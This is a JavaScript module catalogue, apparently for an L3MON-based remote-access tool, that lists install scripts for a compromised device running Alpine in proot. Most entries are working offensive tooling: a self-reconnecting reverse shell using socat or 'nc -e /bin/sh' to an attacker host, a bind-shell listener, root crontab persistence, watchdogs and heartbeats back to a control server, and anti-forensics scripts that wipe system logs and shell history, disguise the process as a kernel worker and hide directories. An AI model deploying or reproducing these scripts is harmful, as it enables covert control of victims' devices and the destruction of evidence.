// Alpine toolkits - deployable module store
// Each module is an install script run inside Alpine proot
module.exports = {
    // ===== EXISTING MODULES =====
    'network-scan': {
        name: 'Network Scanning',
        icon: 'crosshairs',
        description: 'nmap, netcat, socat for port scanning and pivoting',
        install: 'apk add --no-cache nmap netcat-openbsd socat 2>&1 | tail -3'
    },
    'recon': {
        name: 'Recon Toolkit',
        icon: 'search',
        description: 'curl, wget, dnsutils, whois, traceroute for OSINT/recon',
        install: 'apk add --no-cache curl wget bind-tools whois traceroute 2>&1 | tail -3'
    },
    'reverse-ssh': {
        name: 'Reverse SSH',
        icon: 'terminal',
        description: 'openssh, socat for reverse shells and SSH tunneling',
        install: 'apk add --no-cache openssh socat 2>&1 | tail -3 && ssh-keygen -A 2>/dev/null; echo DONE'
    },
    'wifi': {
        name: 'WiFi Tools',
        icon: 'wifi',
        description: 'wireless-tools, iw for WiFi enumeration',
        install: 'apk add --no-cache wireless-tools iw 2>&1 | tail -3'
    },
    'exploit-dev': {
        name: 'Dev & Exploit',
        icon: 'code',
        description: 'python3, gcc, make, git for compiling exploits',
        install: 'apk add --no-cache python3 gcc musl-dev make git 2>&1 | tail -3'
    },
    'proxychains': {
        name: 'Proxychains Pivot',
        icon: 'random',
        description: 'proxychains-ng + nmap for lateral movement through device',
        install: 'apk add --no-cache proxychains-ng nmap 2>&1 | tail -3 && echo "socks4 127.0.0.1 9050" > /etc/proxychains.conf; echo DONE'
    },

    // ===== PERSISTENCE & CONNECTION MODULES =====

    'keepalive': {
        name: 'Connection Keepalive',
        icon: 'refresh',
        description: 'Auto-reconnect tools, watchdog scripts, heartbeat monitors to keep connection alive',
        install: [
            'apk add --no-cache curl bash dcron 2>&1 | tail -1',
            '# Create keepalive watchdog script',
            'mkdir -p /opt/keepalive',
            'cat > /opt/keepalive/watchdog.sh << "WATCHEOF"',
            '#!/bin/sh',
            '# L3MON Connection Watchdog',
            '# Checks server reachability and restarts connection if dead',
            'SERVER="${L3MON_SERVER:-localhost}"',
            'PORT="${L3MON_PORT:-22222}"',
            'INTERVAL=30',
            'while true; do',
            '  if ! nc -zw2 $SERVER $PORT 2>/dev/null; then',
            '    echo "[$(date)] Server unreachable, restarting..."',
            '    # Kill stale connections',
            '    pkill -f "l3mon" 2>/dev/null',
            '    # Re-init connection',
            '    /opt/keepalive/reconnect.sh &',
            '  fi',
            '  sleep $INTERVAL',
            'done',
            'WATCHEOF',
            'chmod +x /opt/keepalive/watchdog.sh',
            '# Create reconnect script',
            'cat > /opt/keepalive/reconnect.sh << "RECEOF"',
            '#!/bin/sh',
            '# Reconnect handler - sends wake signal',
            'echo "[$(date)] Reconnect attempt" >> /tmp/l3mon-reconnect.log',
            'RECEOF',
            'chmod +x /opt/keepalive/reconnect.sh',
            '# Create heartbeat script',
            'cat > /opt/keepalive/heartbeat.sh << "HBEOF"',
            '#!/bin/sh',
            '# Periodic heartbeat to server',
            'while true; do',
            '  curl -sf http://${L3MON_SERVER:-localhost}:${L3MON_WEB_PORT:-22533}/health || true',
            '  sleep 60',
            'done',
            'HBEOF',
            'chmod +x /opt/keepalive/heartbeat.sh',
            'echo "Keepalive tools installed to /opt/keepalive/"'
        ].join(' && ')
    },

    'reverse-shell': {
        name: 'Reverse Shell',
        icon: 'log-in',
        description: 'socat + python3 encrypted reverse shells with auto-reconnect',
        install: [
            'apk add --no-cache socat python3 openssl 2>&1 | tail -1',
            '# Create reverse shell script',
            'mkdir -p /opt/shell',
            'cat > /opt/shell/reverse.sh << "SHEOF"',
            '#!/bin/sh',
            '# L3MON Encrypted Reverse Shell',
            '# Usage: ./reverse.sh <LHOST> <LPORT>',
            'LHOST=$1',
            'LPORT=${2:-4444}',
            'if [ -z "$LHOST" ]; then echo "Usage: $0 <LHOST> <LPORT>"; exit 1; fi',
            'echo "[*] Connecting to $LHOST:$LPORT..."',
            '# Try socat first (encrypted)',
            'if command -v socat >/dev/null 2>&1; then',
            '  while true; do',
            '    socat TCP:$LHOST:$LPORT EXEC:"/bin/sh",pty,stderr,setsid,sigint,sane 2>/dev/null',
            '    echo "[*] Connection lost, reconnecting in 5s..."',
            '    sleep 5',
            '  done',
            'else',
            '  # Fallback to netcat',
            '  while true; do',
            '    nc $LHOST $LPORT -e /bin/sh 2>/dev/null',
            '    sleep 5',
            '  done',
            'fi',
            'SHEOF',
            'chmod +x /opt/shell/reverse.sh',
            '# Create listener script',
            'cat > /opt/shell/listen.sh << "LISEOF"',
            '#!/bin/sh',
            '# L3MON Reverse Shell Listener',
            '# Usage: ./listen.sh <LPORT>',
            'LPORT=${1:-4444}',
            'echo "[*] Listening on port $LPORT..."',
            'socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:"/bin/sh",pty,stderr,setsid,sigint,sane',
            'LISEOF',
            'chmod +x /opt/shell/listen.sh',
            'echo "Reverse shell tools installed to /opt/shell/"'
        ].join(' && ')
    },

    'cron-persist': {
        name: 'Cron Persistence',
        icon: 'clock',
        description: 'Scheduled tasks for auto-restart, health checks, and cleanup',
        install: [
            'apk add --no-cache dcron bash 2>&1 | tail -1',
            '# Create persistence crontab',
            'mkdir -p /opt/cron',
            'cat > /opt/cron/persist.sh << "CRONEOF"',
            '#!/bin/sh',
            '# L3MON Persistence Manager',
            '# Adds cron jobs for auto-restart and cleanup',
            '',
            '# Auto-restart L3MON every 5 minutes if dead',
            'echo "*/5 * * * * /opt/cron/check-l3mon.sh" > /var/spool/cron/crontabs/root',
            '',
            '# Cleanup logs daily',
            'echo "0 0 * * * find /tmp -name "*.log" -mtime +7 -delete" >> /var/spool/cron/crontabs/root',
            '',
            '# Health check every minute',
            'echo "* * * * * /opt/cron/healthcheck.sh" >> /var/spool/cron/crontabs/root',
            '',
            'echo "Cron persistence installed"',
            'CRONEOF',
            'chmod +x /opt/cron/persist.sh',
            '# Create check-l3mon script',
            'cat > /opt/cron/check-l3mon.sh << "CHECKEOF"',
            '#!/bin/sh',
            '# Check if L3MON connection is alive',
            'if ! pgrep -f "l3mon" >/dev/null 2>&1; then',
            '  echo "[$(date)] L3MON not running, restarting..." >> /tmp/l3mon-restart.log',
            '  # Trigger reconnection',
            '  /opt/keepalive/reconnect.sh &',
            'fi',
            'CHECKEOF',
            'chmod +x /opt/cron/check-l3mon.sh',
            '# Create healthcheck script',
            'cat > /opt/cron/healthcheck.sh << "HEALTHEOF"',
            '#!/bin/sh',
            '# Log system health',
            'echo "[$(date)] MEM:$(free -m | awk "/Mem/{print \\$3\\"/\\"\\$2}") DISK:$(df -h / | awk "NR==2{print \\$5}")" >> /tmp/l3mon-health.log',
            '# Keep log under 100 lines',
            'tail -100 /tmp/l3mon-health.log > /tmp/l3mon-health.log.tmp && mv /tmp/l3mon-health.log.tmp /tmp/l3mon-health.log',
            'HEALTHEOF',
            'chmod +x /opt/cron/healthcheck.sh',
            'echo "Cron persistence tools installed to /opt/cron/"'
        ].join(' && ')
    },

    'network-watch': {
        name: 'Network Monitor',
        icon: 'wifi',
        description: 'Monitor network changes, auto-reconnect on IP/WiFi change',
        install: [
            'apk add --no-cache iproute2 curl 2>&1 | tail -1',
            'mkdir -p /opt/netwatch',
            'cat > /opt/netwatch/monitor.sh << "NETEOF"',
            '#!/bin/sh',
            '# L3MON Network Monitor',
            '# Detects network changes and triggers reconnection',
            'LAST_IP=""',
            'while true; do',
            '  CURRENT_IP=$(ip route get 1.1.1.1 2>/dev/null | grep -oP "src \\K[\\S]+" | head -1)',
            '  if [ -n "$LAST_IP" ] && [ "$CURRENT_IP" != "$LAST_IP" ]; then',
            '    echo "[$(date)] Network changed: $LAST_IP -> $CURRENT_IP" >> /tmp/l3mon-netwatch.log',
            '    /opt/keepalive/reconnect.sh &',
            '  fi',
            '  LAST_IP=$CURRENT_IP',
            '  sleep 10',
            'done',
            'NETEOF',
            'chmod +x /opt/netwatch/monitor.sh',
            'cat > /opt/netwatch/wifi-watch.sh << "WIFIEOF"',
            '#!/bin/sh',
            '# Monitor WiFi connection',
            'LAST_SSID=""',
            'while true; do',
            '  SSID=$(iwgetid -r 2>/dev/null)',
            '  if [ -n "$LAST_SSID" ] && [ "$SSID" != "$LAST_SSID" ]; then',
            '    echo "[$(date)] WiFi changed: $LAST_SSID -> $SSID" >> /tmp/l3mon-wifi.log',
            '    /opt/keepalive/reconnect.sh &',
            '  fi',
            '  LAST_SSID=$SSID',
            '  sleep 15',
            'done',
            'WIFIEOF',
            'chmod +x /opt/netwatch/wifi-watch.sh',
            'echo "Network monitor installed to /opt/netwatch/"'
        ].join(' && ')
    },

    'anti-forensics': {
        name: 'Anti-Forensics',
        icon: 'shield',
        description: 'Log cleanup, secure deletion,痕迹 wiping',
        install: [
            'apk add --no-cache coreutils 2>&1 | tail -1',
            'mkdir -p /opt/antiforensics',
            'cat > /opt/antiforensics/clean.sh << "CLEANEOF"',
            '#!/bin/sh',
            '# L3MON Anti-Forensics Cleanup',
            '# Wipes logs and traces',
            'echo "[*] Cleaning logs..."',
            '# Clear system logs',
            'find /var/log -type f -name "*.log" -exec truncate -s 0 {} \\; 2>/dev/null',
            '# Clear temp files',
            'find /tmp -type f -mtime +1 -delete 2>/dev/null',
            '# Clear shell history',
            'history -c 2>/dev/null',
            'rm -f ~/.bash_history ~/.ash_history 2>/dev/null',
            '# Clear L3MON traces',
            'rm -f /tmp/l3mon-*.log 2>/dev/null',
            '# Wipe free space (optional, slow)',
            '# dd if=/dev/zero of=/tmp/wipe bs=1M 2>/dev/null; rm -f /tmp/wipe',
            'echo "[*] Cleanup complete"',
            'CLEANEOF',
            'chmod +x /opt/antiforensics/clean.sh',
            'cat > /opt/antiforensics/stealth.sh << "STEALTHEOF"',
            '#!/bin/sh',
            '# Stealth mode - rename processes, hide files',
            'echo "[*] Entering stealth mode"',
            '# Rename process',
            'exec -a "[kworker/0:0]" "$0" &',
            '# Hide files',
            'for f in /opt/*; do',
            '  [ -d "$f" ] && mv "$f" "/tmp/.${f##*/}" 2>/dev/null',
            'done',
            'echo "[*] Stealth mode active"',
            'STEALTHEOF',
            'chmod +x /opt/antiforensics/stealth.sh',
            'echo "Anti-forensics tools installed to /opt/antiforensics/"'
        ].join(' && ')
    }
};
